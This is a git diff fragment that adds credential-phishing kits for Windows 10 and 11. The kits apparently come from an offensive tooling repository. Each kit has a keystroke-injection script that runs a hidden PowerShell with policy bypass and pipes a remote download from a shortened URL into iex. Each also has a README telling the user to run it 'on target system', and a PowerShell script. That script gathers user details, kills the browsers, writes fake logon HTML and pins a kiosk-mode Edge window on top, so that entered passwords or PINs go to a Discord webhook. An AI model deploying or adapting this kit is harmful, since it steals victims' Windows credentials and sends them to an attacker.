[Windows.Forms.DialogResult]::OK) { +$SelectedFilePath = $FileDialog.FileName +$ImageInput.Text = $SelectedFilePath +} + +}) + +$MainWindow.ShowDialog() | Out-Null +exit diff --git a/Win10-Phishing/Fake-Windows-10-Logon.txt b/Win10-Phishing/Fake-Windows-10-Logon.txt new file mode 100644 index 0000000..73a394e --- /dev/null +++ b/Win10-Phishing/Fake-Windows-10-Logon.txt @@ -0,0 +1,17 @@ +REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook. +REM Author: @beigeworm +REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_win10_to_dc | iex +ENTER diff --git a/Win10-Phishing/README.md b/Win10-Phishing/README.md new file mode 100644 index 0000000..349a471 --- /dev/null +++ b/Win10-Phishing/README.md @@ -0,0 +1,12 @@ + +Fake Windows Logon Screen to Discord Webhook
+ + +SYNOPSIS + +This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. + +USAGE + +1. Replace YOUR_WEBBHOOK_HERE with your webhook. +2. Run script on target system. diff --git a/Win10-Phishing/main.ps1 b/Win10-Phishing/main.ps1 new file mode 100644 index 0000000..2dfb285 --- /dev/null +++ b/Win10-Phishing/main.ps1 @@ -0,0 +1,272 @@ +# GATHER SYSTEM AND USER INFO +$u = (Get-WmiObject Win32_UserAccount -Filter "Name = '$Env:UserName'").FullName +$c = $env:COMPUTERNAME +$wpURL = "https://wallpapercave.com/wp/wp1809099.jpg" + +# DEFAULT LOGIN METHOD +$value = Get-ItemPropertyValue -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\NgcPin" -Name "DeviceLockEnforcementPending" -ErrorAction SilentlyContinue +if ($value -eq 0 -or $value -eq 1) {$mthd = "PIN"} else {$mthd = "Password"} + +# FIND ACCOUNT PICTURES +$accountPicturesPath = "C:\ProgramData\Microsoft\Default Account Pictures" +$imageFiles = Get-ChildItem -Path $accountPicturesPath -include "*.jpg", "*.png", "*.bmp" -File -Recurse +if ($imageFiles.Count -gt 0) { +$firstImage = $imageFiles[0].FullName +$image = [System.Drawing.Image]::FromFile($firstImage) +$usrimg = "$image" +}else {$usrimg = "https://www.tenforums.com/geek/gars/images/2/types/thumb_14400082930User.png"} + +# HTML FOR COVER PAGE +$h = @" + + + + + + +
+
+
+
+
+"@
+
+# HTML FOR LOGIN PAGE
+$h2 = @"
+
+
+
+
+
+
+
+
+
+
+ 08:20
+ Tuesday, October 8
+
+
+
+
+
+
+
+
+
+"@
+
+# SAVE HTML
+$p = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "index.html")
+$h | Out-File -Encoding UTF8 -FilePath $p
+$a = "file://$p"
+$p2 = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "login.html")
+$h2 | Out-File -Encoding UTF8 -FilePath $p2
+
+# KILL ANY BROWSERS (interfere with "Maximazed" argument)
+Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "chrome.exe", "/IM", "msedge.exe" -NoNewWindow -Wait
+Sleep -Milliseconds 100
+
+# START EDGE IN FULLSCREEN
+$edgeProcess = Start-Process -FilePath "msedge.exe" -ArgumentList "--kiosk --app=$a -WindowStyle Maximized" -PassThru
+$edgeProcess.WaitForInputIdle()
+
+Add-Type @"
+ using System;
+ using System.Runtime.InteropServices;
+ public class Win32 {
+ [DllImport("user32.dll")]
+ public static extern IntPtr SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X, int Y, int cx, int cy, uint uFlags);
+ public static readonly IntPtr HWND_TOPMOST = new IntPtr(-1);
+ public static readonly IntPtr HWND_NOTOPMOST = new IntPtr(-2);
+ public const uint SWP_NOMOVE = 0x2;
+ public const uint SWP_NOSIZE = 0x1;
+ public const uint SWP_SHOWWINDOW = 0x40;
+ }
+"@
+
+# SET EDGE AS TOP WINDOW AND START SCREENSAVER
+$null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW)
+Sleep -Milliseconds 250
+$null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW)
+Sleep -Milliseconds 250
+$black = Start-Process -FilePath "C:\Windows\System32\scrnsave.scr"
diff --git a/Win11-Phishing/Fake-Windows-11-Logon.txt b/Win11-Phishing/Fake-Windows-11-Logon.txt
new file mode 100644
index 0000000..0b2f3b1
--- /dev/null
+++ b/Win11-Phishing/Fake-Windows-11-Logon.txt
@@ -0,0 +1,17 @@
+REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook.
+REM Author: @beigeworm
+REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_win11_to_dc | iex
+ENTER
diff --git a/Win11-Phishing/README.md b/Win11-Phishing/README.md
new file mode 100644
index 0000000..349a471
--- /dev/null
+++ b/Win11-Phishing/README.md
@@ -0,0 +1,12 @@
+
+
+
+
+ 
+
+
+
+
+ $u
+ + +I forgot my $mthd
+Fake Windows Logon Screen to Discord Webhook
+ + +SYNOPSIS + +This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. + +USAGE + +1. Replace YOUR_WEBBHOOK_HERE with your webhook. +2. Run script on target system. diff --git a/Win11-Phishing/main.ps1 b/Win11-Phishing/main.ps1 new file mode 100644 index 0000000..f6ec572 --- /dev/null +++ b/Win11-Phishing/main.ps1 @@ -0,0 +1,233 @@ +# GATHER SYSTEM AND USER INFO +$u = (Get-WmiObject Win32_UserAccount -Filter "Name = '$Env:UserName'").FullName +$c = $env:COMPUTERNAME +$wpURL = "https://wallpapercave.com/wp/wp9378862.jpg" + +# DEFAULT LOGIN METHOD +$value = Get-ItemPropertyValue -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\NgcPin" -Name "DeviceLockEnforcementPending" -ErrorAction SilentlyContinue +if ($value -eq 0 -or $value -eq 1) {$mthd = "PIN"} else {$mthd = "Password"} + +# FIND ACCOUNT PICTURES +$accountPicturesPath = "C:\ProgramData\Microsoft\Default Account Pictures" +$imageFiles = Get-ChildItem -Path $accountPicturesPath -include "*.jpg", "*.png", "*.bmp" -File -Recurse +if ($imageFiles.Count -gt 0) { +$firstImage = $imageFiles[0].FullName +$image = [System.Drawing.Image]::FromFile($firstImage) +$usrimg = "$image" +}else {$usrimg = "https://www.tenforums.com/geek/gars/images/2/types/thumb_14400082930User.png"} + +# HTML FOR COVER PAGE +$h = @" +08:20
Tuesday, October 8
+
+
+
+
+"@
+
+# SAVE HTML
+$p = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "index.html")
+$h | Out-File -Encoding UTF8 -FilePath $p
+$a = "file://$p"
+$p2 = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "login.html")
+$h2 | Out-File -Encoding UTF8 -FilePath $p2
+
+# KILL ANY BROWSERS (interfere with "Maximazed" argument)
+Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "chrome.exe", "/IM", "msedge.exe" -NoNewWindow -Wait
+Sleep -Milliseconds 100
+
+# START EDGE IN FULLSCREEN
+$edgeProcess = Start-Process -FilePath "msedge.exe" -ArgumentList "--kiosk --app=$a -WindowStyle Maximized" -PassThru
+$edgeProcess.WaitForInputIdle()
+
+Add-Type @"
+ using System;
+ using System.Runtime.InteropServices;
+ public class Win32 {
+ [DllImport("user32.dll")]
+ public static extern IntPtr SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X, int Y, int cx, int cy, uint uFlags);
+ public static readonly IntPtr HWND_TOPMOST = new IntPtr(-1);
+ public static readonly IntPtr HWND_NOTOPMOST = new IntPtr(-2);
+ public const uint SWP_NOMOVE = 0x2;
+ public const uint SWP_NOSIZE = 0x1;
+ public const uint SWP_SHOWWINDOW = 0x40;
+ }
+"@
+
+# SET EDGE AS TOP WINDOW AND START SCREENSAVER
+$null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW)
+Sleep -Milliseconds 250
+$null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW)
+Sleep -Milliseconds 250
+$black = Start-Process -FilePath "C:\Windows\System32\scrnsave.scr"
+
+
+
+
+
+
+
+ $u
+ + +I forgot my $mthd
+